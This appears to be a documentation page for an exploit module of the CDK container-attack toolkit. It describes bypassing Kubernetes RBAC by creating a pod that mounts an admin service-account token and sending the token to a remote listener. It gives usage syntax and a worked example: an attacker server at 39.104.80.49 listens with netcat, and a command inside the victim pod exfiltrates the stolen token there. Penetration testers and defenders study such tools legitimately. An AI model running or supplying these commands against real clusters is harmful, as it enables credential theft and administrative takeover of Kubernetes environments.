You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Bypass K8s RBAC with pod create privilege. This exploit will create a pod with target(admin) service-account token mounted, then read the token and send it to remote IP:Port.
cdk run k8s-get-sa-token (default|anonymous|<service-account-token-path>) <target-service-account> <ip> <port>"
Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.
Exploit Options:
target-service-account: target service-account token to dump(e.g. admin).
ip: target remote IP to hijack traffic.
port: target remote PORT to hijack traffic.
Example
First listen a port in a public server to receive data
(on attacker's public server, e.g. 39.104.80.49)
nc -lvp 999
Inside victim pod which has "create pod" privilege, run CDK exploit to dump "admin" service-account's token.
(in victim pod)
./cdk run k8s-get-sa-token default admin 39.104.80.49 999